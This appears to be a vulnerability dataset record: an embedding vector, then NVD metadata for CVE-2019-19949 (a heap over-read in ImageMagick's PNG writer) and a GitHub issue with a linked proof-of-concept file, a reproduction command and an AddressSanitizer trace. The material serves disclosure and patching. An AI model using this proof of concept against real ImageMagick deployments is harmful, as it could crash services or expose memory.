-0.019694823771715164, 0.0006197940674610436, 0.020387761294841766, 0.013712462969124317, -0.000872427539434284, 0.0007920660427771509, -0.009485544636845589, 0.006425070576369762, 0.02257436327636242, -0.009962901473045349, -0.019217466935515404, 0.020634138956665993, -0.013889547437429428, 0.025376910343766212, 0.034000132232904434, -0.018755508586764336, -0.018462935462594032, 0.018555326387286186, 0.00413837656378746, 0.0027621258050203323, -0.004658079706132412, -0.03769579902291298, -0.028302647173404694, 0.009685726836323738, -0.005651290062814951, -0.021542657166719437, -0.01281164400279522, -0.0009585635270923376, -0.002355987438932061, -0.023221105337142944, -0.026146842166781425, 0.031967516988515854, 0.014543987810611725, 0.02366766519844532, 0.002698606578633189, 0.011033104732632637, -0.002995029790326953, 0.008854201063513756, -0.02630082704126835, -0.003037376096472144, -0.015406310558319092, -0.01695387065410614, -0.0033318744972348213, -0.005420310888439417, -0.004515642765909433, -0.006440469063818455, 0.01980261318385601, 0.004126827698200941, 0.0006972683477215469, 0.0018247354310005903, 0.0033222504425793886, -0.005528101231902838, -0.0073066409677267075, 0.021619649603962898, 0.0089157959446311, -0.0030758725479245186, 0.005828374531120062, 0.003389619290828705, -0.014320707879960537, 0.0017592912772670388, -0.009647229686379433, -0.0034974096342921257, -0.014420798979699612, -0.042007412761449814, -0.01715405285358429, -0.0031182188540697098, -0.011541259475052357, 0.001704433816485107, -0.006032405886799097, 0.012719253078103065, 0.013951141387224197, 0.00427311472594738, 0.006040105130523443, 0.007645410485565662, 0.007241196930408478, -0.0022039262112230062, 0.023575274273753166, 0.020018193870782852, -0.0023598370607942343, -0.030935809016227722, 0.004276964347809553, 0.009577936492860317, 0.0031182188540697098, -0.0037842087913304567, -0.016984667629003525, -0.009947502985596657, -0.008053473196923733, -0.006028556264936924, 0.015113736502826214, -0.0009681876981630921, -0.00013690328341908753, -0.008800306357443333, -0.010394062846899033, 0.011856930330395699, 0.00993980374187231, 0.001213603070937097, 0.016307128593325615, -0.0067407418973743916, 0.012134105898439884, -0.015098338015377522, -0.030674032866954803, -0.0006655087345279753, 0.0071141584776341915, 0.005520401988178492, 0.0037822837475687265, -0.028441235423088074, 0.010532650165259838, -0.003763035638257861, 0.014921254478394985, 0.014128225855529308, 0.010871419683098793, -0.007849441841244698, 0.010293971747159958, 0.0004066195688210428, -0.01789318583905697, 0.004773569293320179, -0.020387761294841766, 0.013643169775605202, 0.012649958953261375, -0.019494641572237015, 0.0037784341257065535, 0.0370490588247776, -0.009654928930103779, 0.031228384003043175, 0.0015860568964853883, 0.017985578626394272, 0.000958082324359566, 0.0056628393940627575, 0.005443409085273743, -0.003605199744924903, 0.0052855731919407845, -0.00664835050702095, 0.008007277734577656, 0.015637289732694626, -0.012049413286149502, -0.002252046950161457, 0.009100578725337982, -0.013127315789461136, -0.007976480759680271, 0.002921886509284377, -0.0006457792478613555, 0.02528451941907406, 0.010809824801981449, -0.00847693532705307, 0.036648694425821304, -0.01587596721947193, 0.029673123732209206, 0.009038984775543213, -0.007907186634838581, -0.0016611252212896943, 0.002024917397648096, 0.015067541040480137, -0.010825223289430141, 0.011548958718776703, -0.005728283431380987, -0.0149905476719141, 0.002977706491947174, -0.010124586522579193, -0.008384543471038342, -0.01756981573998928, -0.015267723239958286, 0.036925870925188065, -0.0024811013136059046, -0.010078391060233116, 0.0019960450008511543, -0.018016375601291656, 0.010039894841611385, 0.019510040059685707, -0.035232022404670715, 0.010925314389169216, -0.034954845905303955, -0.010563447140157223, 0.0168306827545166, 0.002787148579955101, -0.011441168375313282, -0.013735560700297356, 0.0024657025933265686, -0.020018193870782852, 0.00744137866422534, -0.005655140150338411, -0.009362355805933475, 0.0026216134428977966, -0.013712462969124317, -0.018000977113842964, -0.01938685216009617, -0.0097627192735672, -0.0050584436394274235, 0.021742839366197586, 0.031105194240808487, -0.03403092920780182, -0.01098690927028656, 0.007006368134170771, -0.015952961519360542, 0.020033592358231544, 0.003868900937959552, 0.004507943522185087, -0.006043954752385616, 0.002731328597292304, -0.005274024326354265, -0.02109609730541706, -0.00928536243736744, -0.008353746496140957, 0.0007886976236477494, -0.00018827208259608597, -0.0077301026321947575, -0.009100578725337982, 0.016322527080774307, -0.004092181101441383, -0.000014007623576617334, -0.005016097333282232, 0.004161474760621786, -0.027240142226219177, 0.02705536037683487, -0.007753200829029083, 0.040375158190727234, -0.011641349643468857, 0.0028160209767520428, -0.005555049050599337, 0.00261968863196671, -0.0024753266479820013, -0.00149559008423239, 0.01421291846781969, -0.03335339203476906, -0.012480574660003185, -0.001287708873860538, -0.006829284131526947, -0.013281302526593208, -0.000025428760636714287, 0.00518548209220171, -0.015460205264389515, 0.019417649134993553, 0.00928536243736744, 0.023821651935577393, 0.013774057850241661, -0.024406798183918, 0.012365085072815418, 0.005096940323710442, 0.022497370839118958, 0.007583816070109606, -0.008353746496140957, 0.005735982675105333, -0.0009417213150300086, 0.010301670990884304, -0.012850141152739525, 0.008646320551633835, 0.0029603829607367516, 0.018601521849632263, 0.019540837034583092, -0.02115769125521183, -0.0009133301209658384, -0.003647546051070094, -0.03449288755655289, 0.011849231086671352, -0.015783576294779778, 0.00768005708232522, 0.0014455446507781744, 0.015575694851577282, 0.0031278429087251425, 0.007606913801282644, -0.009408551268279552, 0.0024098826106637716, 0.009015887044370174, 0.01756981573998928, 0.0036937417462468147, 0.01475186925381422, -0.02392944134771824, 0.01749282144010067, 0.015337016433477402, 0.016445716843008995, 0.013504581525921822, 0.002109609777107835, 0.000528364849742502, -0.0007641560514457524, 0.003445439273491502, -0.010794426314532757, 0.007060263305902481, 0.013289001770317554, 0.01647651381790638, 0.004492544569075108, -0.0018959540175274014, -0.00993980374187231, 0.00713725620880723, 0.007626162376254797, -0.012418979778885841, 0.008577026426792145, -0.0041807228699326515, -0.008292151615023613, 0.009516341611742973, 0.022004615515470505, 0.003341498551890254, 0.029395949095487595, 0.0014022360555827618, -0.019109675660729408, -0.004473296459764242, 0.012904035858809948, -0.0012511371169239283, 0.015067541040480137, -0.0037264639977365732, -0.008053473196923733, 0.005520401988178492, 0.0075684175826609135, -0.009431648999452591, -0.0011625951156020164, -0.010278573259711266, -0.0027717500925064087, 0.003189437324181199, -0.011941622942686081, 0.01505984179675579, -0.017508219927549362, 0.006652200128883123, 0.014836561866104603, 0.01729264110326767, -0.014628680422902107, -0.003401168156415224, 0.0025811921805143356, 0.0006544409552589059, -0.0011433468898758292, -0.009431648999452591, -0.001712133060209453, 0.0021827530581504107, 0.004869810771197081, 0.00908518023788929, -0.0042923628352582455, 0.00518548209220171, -0.0008753148140385747, -0.00922376848757267, -0.01940225064754486, -0.014028134755790234, 0.004661929327994585, 0.00018899388669524342, 0.025530897080898285, 0.0014320708578452468, -0.020249173045158386, -0.011194790713489056, 0.013843351043760777, -0.006917825900018215, -0.009423949755728245, 0.008184362202882767, 0.012018616311252117, 0.011187090538442135, -0.0015995306894183159, -0.015637289732694626, -0.004384754691272974, 0.020172180607914925, 0.010555747896432877, -0.01601455546915531, 0.01966402679681778, -0.004250016529113054, 0.003264505648985505, 0.0024791762698441744, 0.018201157450675964, -0.005605094600468874, 0.010293971747159958, 0.010055293329060078, -0.011471965350210667, 0.01261916197836399, 0.008469236083328724, 0.027286339551210403, -0.02305172011256218, 0.012904035858809948, -0.01974101923406124, 0.002823720220476389, -0.020788125693798065, 0.01037096418440342, 0.017877787351608276, -0.00878490786999464, -0.03010428510606289, -0.01641491986811161, -0.010340167209506035, 0.023744657635688782, -0.010247775353491306, 0.014620981179177761, -0.01536011416465044, -0.0066560497507452965, 0.018940292298793793, -0.0038900740910321474, 0.020310768857598305, 0.003449288895353675, -0.01275005005300045, -0.0032356332521885633, -0.0029757816810160875, 0.003089346457272768, 0.0035416805185377598, -0.002846818184480071, -0.025407709181308746, 0.002384859835729003, 0.019895005971193314, 0.016661297529935837, 0.017739199101924896, -0.021727440878748894, -0.014620981179177761, 0.006247986573725939, -0.001120248925872147, 0.011125496588647366, -0.004569537937641144, 0.021989217028021812, -0.009608733467757702, 0.0011308355024084449, -0.003628297708928585, -0.0012030164944007993, 0.01315811276435852, 0.0010182331316173077, -0.009839712642133236, -0.0015793200582265854, -0.004404002800583839, 0.013204309158027172, 0.03504724055528641, -0.018000977113842964, 0.012134105898439884, 0.0039054728113114834, -0.005043045151978731, 0.024730170145630836, -0.017246443778276443, -0.011402671225368977, 0.0019748718477785587, -0.019155872985720634, 0.002459928160533309, -0.0011029255110770464, -0.009185271337628365, 0.021065300330519676, -0.0008815705077722669, -0.018770907074213028, 0.007907186634838581, -0.023067118600010872, -0.007364385761320591, 0.005100789945572615, 0.006733042653650045, -0.0016755614196881652, 0.0031509408727288246, -0.0030989705119282007, -0.039081674069166183, -0.0013348670909181237, -0.0014445822453126311, -0.007283543236553669, 0.008500033058226109, -0.014551687054336071, 0.031844329088926315, 0.019032683223485947, 0.016907675191760063, -0.016399521380662918, -0.0019180894596502185, -0.006794637069106102, 0.0013685515150427818, -0.004823614843189716, 0.009570237249135971, 0.022481972351670265, 0.0037187645211815834, -0.0008786832331679761, 0.00737593462690711, 0.010317069478332996, -0.01619933918118477, 0.0026004405226558447, -0.01790858432650566, -0.00640582200139761, 0.004045985173434019, -0.012411280535161495, 0.005581996403634548, -0.0012444002786651254, -0.008861900307238102, 0.005227828398346901, -0.020326167345046997, -0.003143241396173835, -0.011787637136876583, -0.014790366403758526, 0.009015887044370174, -0.007179602514952421, 0.01613774523139, -0.0011876178905367851, -0.007352836895734072, 0.018278151750564575, -0.004573387559503317, 0.0027159301098436117, -0.009647229686379433, 0.0009850298520177603, 0.024529987946152687, -0.021142292767763138, -0.01024007610976696, 0.012626861222088337, -0.008923495188355446, -0.009308460168540478, -0.005281723570078611, -0.0003613861626945436, 0.022820740938186646, -0.041668642312288284, -0.005566597916185856, 0.016045352444052696, -0.002910337410867214, -0.01872471161186695, -0.017785396426916122, 0.002694756956771016, 0.018894094973802567, -0.007891788147389889, -0.003149016061797738, -0.008808005601167679, 0.010771328583359718, 0.017939381301403046, 0.023067118600010872, 0.016907675191760063, -0.014490093104541302, 0.010648139752447605, -0.004342408385127783, 0.009585635736584663, 0.012349685654044151, -0.01353537943214178, -0.0016130044823512435, -0.020695732906460762, 0.0060516539961099625, 0.008569327183067799, -0.0067715393379330635, 0.020664935931563377, 0.011980119161307812, 0.0024503041058778763, -0.018663115799427032, -0.008399941958487034, -0.009601034224033356, 0.005258625838905573, -0.0030393009074032307, 0.0006510725361295044, 0.004469446837902069, 0.015544897876679897, 0.010332467965781689, 0.008084271103143692, -0.009208369068801403, 0.0034377400297671556, -0.01926366239786148, -0.006894728168845177, -0.011302580125629902, 0.019556235522031784, -0.00956253707408905, 0.0006582906353287399, 0.006324979476630688, -0.010101488791406155, 0.011148594319820404, -0.012526770122349262, -0.013458386063575745, 0.004654230084270239, -0.00756071787327528, -0.028025472536683083, 0.0029873305466026068, -0.016645899042487144, 0.019309857860207558, 0.003129767719656229, 0.01087911892682314, -0.009862810373306274, -0.017585214227437973, -0.004026736598461866, 0.007745501585304737, 0.014605582691729069, -0.027963878586888313, 0.0076184626668691635, -0.02034156583249569, 0.004688877146691084, -0.0005216279532760382, -0.002735178219154477, 0.015206128358840942, 0.007379784248769283, -0.012942533008754253, -0.021049901843070984, -0.012018616311252117, 0.01932525634765625, 0.018663115799427032, 0.019494641572237015, 0.011818434111773968, 0.01924826391041279, 0.012857840396463871, -0.0015235000755637884, 0.005505003500729799, 0.00020162556029390544, 0.018016375601291656, -0.01342758908867836, 0.0014907780569046736, -0.010848321951925755, 0.014651778154075146, 0.001030744519084692, -0.01007069181650877, -0.008138165809214115, -0.020772727206349373, 0.01431300863623619, 0.007325889077037573, 0.0007939909119158983, -0.010871419683098793, 0.0029007133562117815, -0.01359697338193655, 0.013566176407039165, 0.0031836628913879395, 0.009046684019267559, 0.013088819570839405, 0.0023174909874796867, 0.012973329983651638, 0.0042115203104913235, -0.007522221654653549, 0.013704763725399971, -0.002361761871725321, 0.03390774130821228, 0.0014936652733013034, 0.0062364377081394196, -0.007476025726646185, 0.0062364377081394196, -0.00039458941319026053, 0.014543987810611725, 0.018555326387286186, 0.0021288578864187002, -0.00293151056393981, 0.0019633229821920395, 0.019217466935515404, 0.007175752893090248, -0.01315811276435852, -0.023960238322615623, 0.00963183119893074, -0.0031124441884458065, -0.002894938923418522, -0.006525161676108837, 0.0024888005573302507, -0.031305376440286636, -0.016230136156082153, -0.011140895076096058, -0.004912157077342272, 0.01709245890378952, -0.022127803415060043, 0.016091547906398773, 0.021111495792865753, 0.028564423322677612, -0.0007805171189829707, -0.012742350809276104, -0.002910337410867214, 0.015475603751838207, 0.00959333498030901, -0.01601455546915531, 0.00922376848757267, -0.004827464465051889, -0.0031971365679055452, 0.010016796179115772, -0.0011154368985444307, 0.008384543471038342, -0.0005735982558690012, -0.001481153885833919, 0.014620981179177761, 0.0009133301209658384, 0.009162173606455326, 0.014289910905063152, 0.01587596721947193, 0.014998246915638447, 0.0006428920314647257, -0.014159022830426693, 0.0032799041364341974, -0.014020435512065887, 0.004681177902966738, 0.016846081241965294, -0.00027958102873526514, 0.025207526981830597, 0.0033299496863037348, -0.001384912640787661, 0.011479664593935013, 0.006378874648362398, -0.00016457265883218497, -0.009785817004740238, 0.013712462969124317, 0.004072932526469231, 0.012111007235944271, 0.026146842166781425, 0.0009354656212963164, -0.008992789313197136, 0.010386363603174686, 0.009770418517291546, 0.011749139986932278, 0.004677328281104565, 0.02006438933312893, -0.026069847866892815, 0.016599703580141068, -0.006682997103780508, 0.040436752140522, -0.0015052142553031445, -0.014505491591989994, 0.0007304716273210943, -0.013812554068863392, 0.017000066116452217, 0.048659611493349075, 0.002280919346958399, -0.0027024562004953623, -0.021527258679270744, 0.000047037945478223264, -0.006929374765604734, -0.03871210664510727, 0.032183095812797546, 0.014959750697016716, 0.013581574894487858, -0.018770907074213028, -0.0014609432546421885, -0.008184362202882767, 0.008823404088616371, 0.00029305482166819274, -0.009678026661276817, 0.01924826391041279, 0.002352137817069888, -0.006498213857412338, 0.0062787835486233234, 0.010832922533154488, -0.009169872850179672, 0.007476025726646185, 0.016461115330457687, -0.0022424226626753807, -0.000971074914559722, 0.007445228286087513, -0.013204309158027172, -0.018231956288218498, 0.004808216355741024, -0.0006515537388622761, 0.019710222259163857, -0.00756071787327528, -0.0023155661765486, -0.0029449844732880592, -0.0009330596076324582, -0.015891367569565773, -0.012796245515346527, 0.010317069478332996, 0.026731988415122032, -0.03581716865301132, -0.007402882445603609, 0.004076782148331404, 0.005716734565794468, -0.0020518649835139513, -0.004869810771197081, 0.010101488791406155, -0.0032702800817787647, -0.017954779788851738, -0.007645410485565662, 0.009924405254423618, 0.015075240284204483, 0.005828374531120062, 0.007094909902662039, -0.0016495762392878532, 0.00598236033692956, -0.0168306827545166, 0.017754599452018738, 0.007961082272231579, -0.01601455546915531, -0.0064289201982319355, 0.01311961654573679, -0.0038458032067865133, 0.02597745694220066, 0.019633229821920395, -0.01938685216009617, -0.008731012232601643, -0.0020229925867170095, 0.006363476160913706, 0.02514593116939068, -0.0011991668725386262, -0.009985999204218388, 0.012773147784173489, 0.00834604725241661, -0.001331979874521494, -0.0037899832241237164, 0.00384002854116261, -0.007606913801282644, -0.010594244115054607, -0.00042418361408635974, 0.011987818405032158, -0.029041780158877373, 0.027024561539292336, 0.012188000604510307, 0.009092879481613636, -0.0039497436955571175, -0.015983758494257927, 0.00959333498030901, -0.0010480679338797927, 0.007499123457819223, -0.003318400587886572, -0.016784485429525375, -0.036525506526231766, -0.0018487958004698157, 0.019140474498271942, -0.0015158008318394423, -0.0035339812748134136, 0.007348987273871899, 0.010848321951925755, -0.022897735238075256, -0.004161474760621786, 0.015052142553031445, 0.017985578626394272, 0.015467904508113861, -0.012095608748495579, 0.023298097774386406, -0.017800794914364815, 0.009385453537106514, 0.023513678461313248, -0.017415829002857208, -0.009924405254423618, -0.0012520995223894715, -0.002363686915487051, -0.02426821179687977, -0.00635577691718936, -0.01261916197836399, 0.011333378031849861, -0.0394512414932251, -0.011649048887193203, 0.006043954752385616, 0.016245534643530846, 0.007164204027503729, 0.016984667629003525, -0.010317069478332996, 0.003189437324181199, -0.004584936425089836, 0.004011338111013174, 0.006224888376891613, -0.011856930330395699, -0.026408618316054344, -0.00847693532705307, 0.006144045852124691, 0.014536288566887379, -0.01994120143353939, 0.05759080499410629, 0.024730170145630836, 0.010702034458518028, 0.011379573494195938, 0.006606004200875759, 0.0036263728979974985, 0.011110098101198673, 0.0026504858396947384, -0.021450264379382133, 0.010009096935391426, -0.00420382060110569, -0.00047519151121377945, 0.02643941529095173, -0.014944352209568024, 0.005293272435665131, -0.0046388315968215466, -0.030273670330643654, 0.003445439273491502, -0.011695245280861855, -0.014975149184465408, 0.007791697047650814, -0.0031451662071049213, 0.029349753633141518, -0.015906766057014465, 0.0019565860275179148, 0.018185758963227272, 0.015290820971131325, 0.003924720920622349, -0.004480995703488588, -0.02630082704126835, -0.006552109029144049, -0.0032394828740507364, -0.008130466565489769, 0.013766358606517315, 0.016568904742598534, 0.011094699613749981, -0.004842863418161869, 0.02155805565416813, -0.00774935120716691, -0.02203541249036789, -0.011803035624325275, 0.0006116135627962649, -0.010832922533154488, -0.0028179457876831293, 0.012565266340970993, 0.01067893672734499, -0.016861479729413986, 0.005847622640430927, -0.002635087352246046, 0.005412611644715071, 0.0052085802890360355, -0.002144256606698036, -0.009054383262991905, 0.0022616710048168898, -0.0014676800929009914, -0.01675368845462799, 0.007595364935696125, 0.012596064247190952, -0.012911735102534294, -0.012418979778885841, -0.0009431649232283235, -0.011980119161307812, 0.006632951553910971, -0.0005384701653383672, -0.0210191048681736, -0.0075337705202400684, 0.0054010627791285515, 0.014497792348265648, -0.01183383259922266, 0.002103835344314575, 0.007783997803926468, 0.008138165809214115, 0.007425980176776648, -0.013335197232663631, -0.018539927899837494, -0.015252324752509594, 0.015814373269677162, -0.014320707879960537, 0.002486875746399164, 0.008161263540387154, -0.016661297529935837, -0.008723312988877296, -0.006498213857412338, -0.010355565696954727, -0.022143201902508736, -0.008446138352155685, -0.008538530208170414, -0.007860991172492504, -0.019217466935515404, 0.017862388864159584, 0.0024137322325259447, 0.02257436327636242, -0.012934833765029907, -0.0035513045731931925, 0.008076571859419346, -0.012064811773598194, -0.009008187800645828, 0.0210191048681736, -0.0013935742899775505, 0.012588365003466606, -0.01918666996061802, -0.0034627625718712807, -0.025392308831214905, -0.013697064481675625, 0.002140406984835863, -0.0217120423913002, -0.016722891479730606, -0.016584303230047226, -0.013758659362792969, 0.0030989705119282007, 0.014721072278916836, 0.0017872012685984373, -0.015036744065582752, 0.0000683914840919897, 0.004396303556859493, -0.002483026124536991, 0.001782389241270721, 0.0033511228393763304, 0.008946592919528484, -0.006482815369963646, -0.006686846725642681, -0.006910126656293869, 0.029519136995077133, 0.013750960119068623, -0.002794847823679447, -0.004954502917826176, 0.010586544871330261, 0.008184362202882767, 0.00100475933868438, 0.010170782916247845, -0.008007277734577656, -0.0129502322524786, -0.007853291928768158, 0.016984667629003525, -0.006017007399350405, 0.010979210026562214, -0.009531740099191666, 0.011756839230656624, 0.02055714651942253, -0.0013194684870541096, -0.022666756063699722, 0.04896758496761322, -0.004427100531756878, 0.020587943494319916, -0.013720162212848663, -0.010394062846899033, -0.019910404458642006, -0.023744657635688782, 0.015244624577462673, -0.027640506625175476, 0.015629589557647705, -0.009862810373306274, 0.012334287166595459, 0.002694756956771016, -0.005693636368960142, 0.011264083907008171, 0.02094211056828499, 0.009978299960494041, -0.036648694425821304, 0.010232376866042614, -0.004246166907250881, -0.01061734277755022, -0.005096940323710442, -0.00932385865598917, 0.01653810776770115, -0.0064289201982319355, -0.005481905769556761, -0.018293550238013268, 0.007029465865343809, 0.003122068475931883, 0.0059361644089221954, 0.011264083907008171, -0.0008156452095136046, -0.01607614941895008, -0.0006890878430567682, 0.020187579095363617, 0.0017034712946042418, 0.009185271337628365, 0.030704829841852188, 0.019140474498271942, 0.016707492992281914, -0.014259113930165768, -0.023113315925002098, 0.026762785390019417, 0.006136346608400345, -0.007245046552270651, -0.01790858432650566, 0.0007526071276515722, 0.011980119161307812, -0.009169872850179672, -0.01190312672406435, -0.015552597120404243, 0.018555326387286186, -0.0168306827545166, -0.02420661598443985, 0.030566243454813957, 0.014505491591989994, -0.0011491213226690888, 0.00799957849085331, -0.006644500885158777, -0.0011876178905367851, -0.012218797579407692, -0.014828862622380257, 0.019694823771715164 ]
1,782
CVE-2019-19949
2019-12-24T01:15:11.327000
In ImageMagick 7.0.8-43 Q16, there is a heap-based buffer over-read in the function WritePNGImage of coders/png.c, related to Magick_png_write_raw_profile and LocaleNCompare.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.4, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 4.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.1, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.2, "source": "nvd@nist.gov", "type": "Primary" } ] }
[ { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://lists.opensuse.org/opensuse-security-announce/2020-02/msg00006.html" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ], "url": "https://github.com/ImageMagick/ImageMagick/issues/1561" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2019/12/msg00033.html" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/08/msg00030.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4549-1/" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://www.debian.org/security/2020/dsa-4712" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "78819D62-25B5-4F9E-8291-2C1FD9803531", "versionEndExcluding": "6.9.10-43", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "6.9.9-33", "vulnerable": true }, { "criteria": "cpe:2.3:a:imagemagick:imagemagick:*:*:*:*:*:*:*:*", "matchCriteriaId": "9C915428-2EBC-492C-89C5-55F84DECDEDB", "versionEndExcluding": "7.0.8-43", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "7.0.7-23", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:8.0:*:*:*:*:*:*:*", "matchCriteriaId": "C11E6FB0-C8C0-4527-9AA0-CB9B316F8F43", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:debian:debian_linux:10.0:*:*:*:*:*:*:*", "matchCriteriaId": "07B237A9-69A3-4A9C-9DA0-4E06BD37AE73", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:20.04:*:*:*:lts:*:*:*", "matchCriteriaId": "902B8056-9E37-443B-8905-8AA93E2447FB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:opensuse:leap:15.1:*:*:*:*:*:*:*", "matchCriteriaId": "B620311B-34A3-48A6-82DF-6F078D7A4493", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
https://github.com/ImageMagick/ImageMagick/issues/1561
[ "Exploit", "Issue Tracking", "Patch", "Third Party Advisory" ]
github.com
[ "ImageMagick", "ImageMagick" ]
### Prerequisites - [x] I have written a descriptive issue title - [X] I have verified that I am using the latest version of ImageMagick - [X] I have searched [open](https://github.com/ImageMagick/ImageMagick/issues) and [closed](https://github.com/ImageMagick/ImageMagick/issues?q=is%3Aissue+is%3Aclosed) issues to ensure it has not already been reported ### Description <!-- A description of the bug or feature --> There is a heap buffer overflow vulnerability in function WritePNGImage of png.c. ### Steps to Reproduce <!-- List of steps, sample code, failing test or link to a project that reproduces the behavior. Make sure you place a stack trace inside a code (```) block to avoid linking unrelated issues --> [poc](https://drive.google.com/open?id=11dbKOgAj3s8BPTO4P4Xescp2-2HlQUBP) magick convert $poc ./test.png `=================================================================` `==41625==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60200000b251 at pc 0x7f57acd61145 bp 0x7fff0c9e88f0 sp 0x7fff0c9e8098` `READ of size 1 at 0x60200000b251 thread T0` ` #0 0x7f57acd61144 (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x4b144)` ` #1 0x435b4e in LocaleNCompare MagickCore/locale.c:1581` ` #2 0x76bab9 in Magick_png_write_raw_profile coders/png.c:8183` ` #3 0x77be6c in WriteOnePNGImage coders/png.c:11083` ` #4 0x783ffa in WritePNGImage coders/png.c:12744` ` #5 0x849036 in WriteImage MagickCore/constitute.c:1159` ` #6 0x849d5b in WriteImages MagickCore/constitute.c:1376` ` #7 0xbf16d0 in ConvertImageCommand MagickWand/convert.c:3305` ` #8 0xcdf180 in MagickCommandGenesis MagickWand/mogrify.c:185` ` #9 0x4100a1 in MagickMain utilities/magick.c:149` ` #10 0x410282 in main utilities/magick.c:180` ` #11 0x7f57a860f82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)` ` #12 0x40fbb8 in _start (/home/ImageMagick/utilities/magick+0x40fbb8)` `` `0x60200000b251 is located 0 bytes to the right of 1-byte region [0x60200000b250,0x60200000b251)` `allocated by thread T0 here:` ` #0 0x7f57acdae602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)` ` #1 0x44096a in AcquireMagickMemory MagickCore/memory.c:478` ` #2 0x4409be in AcquireQuantumMemory MagickCore/memory.c:551` ` #3 0x4c4165 in ConstantString MagickCore/string.c:713` ` #4 0x49a6fb in CloneSplayTree MagickCore/splay-tree.c:372` ` #5 0x487eab in CloneImageProfiles MagickCore/profile.c:190` ` #6 0x418926 in CloneImage MagickCore/image.c:838` ` #7 0x76d056 in WriteOnePNGImage coders/png.c:8528` ` #8 0x783ffa in WritePNGImage coders/png.c:12744` ` #9 0x849036 in WriteImage MagickCore/constitute.c:1159` ` #10 0x849d5b in WriteImages MagickCore/constitute.c:1376` ` #11 0xbf16d0 in ConvertImageCommand MagickWand/convert.c:3305` ` #12 0xcdf180 in MagickCommandGenesis MagickWand/mogrify.c:185` ` #13 0x4100a1 in MagickMain utilities/magick.c:149` ` #14 0x410282 in main utilities/magick.c:180` ` #15 0x7f57a860f82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)` `` `SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 ??` `Shadow bytes around the buggy address:` ` 0x0c047fff95f0: fa fa 07 fa fa fa 00 01 fa fa 00 fa fa fa 04 fa` ` 0x0c047fff9600: fa fa 00 03 fa fa 00 fa fa fa 00 02 fa fa 06 fa` ` 0x0c047fff9610: fa fa 00 05 fa fa 05 fa fa fa 00 fa fa fa 01 fa` ` 0x0c047fff9620: fa fa 00 02 fa fa 00 04 fa fa 00 04 fa fa 00 04` ` 0x0c047fff9630: fa fa 03 fa fa fa 00 02 fa fa 07 fa fa fa 07 fa` `=>0x0c047fff9640: fa fa 00 01 fa fa 04 fa fa fa[01]fa fa fa 00 04` ` 0x0c047fff9650: fa fa 04 fa fa fa 04 fa fa fa 00 02 fa fa 06 fa` ` 0x0c047fff9660: fa fa 04 fa fa fa 00 02 fa fa 06 fa fa fa 04 fa` ` 0x0c047fff9670: fa fa 00 02 fa fa 06 fa fa fa 04 fa fa fa 00 02` ` 0x0c047fff9680: fa fa 06 fa fa fa 04 fa fa fa 00 02 fa fa 00 03` ` 0x0c047fff9690: fa fa 06 fa fa fa 04 fa fa fa 00 02 fa fa 05 fa` `Shadow byte legend (one shadow byte represents 8 application bytes):` ` Addressable: 00` ` Partially addressable: 01 02 03 04 05 06 07 ` ` Heap left redzone: fa` ` Heap right redzone: fb` ` Freed heap region: fd` ` Stack left redzone: f1` ` Stack mid redzone: f2` ` Stack right redzone: f3` ` Stack partial redzone: f4` ` Stack after return: f5` ` Stack use after scope: f8` ` Global redzone: f9` 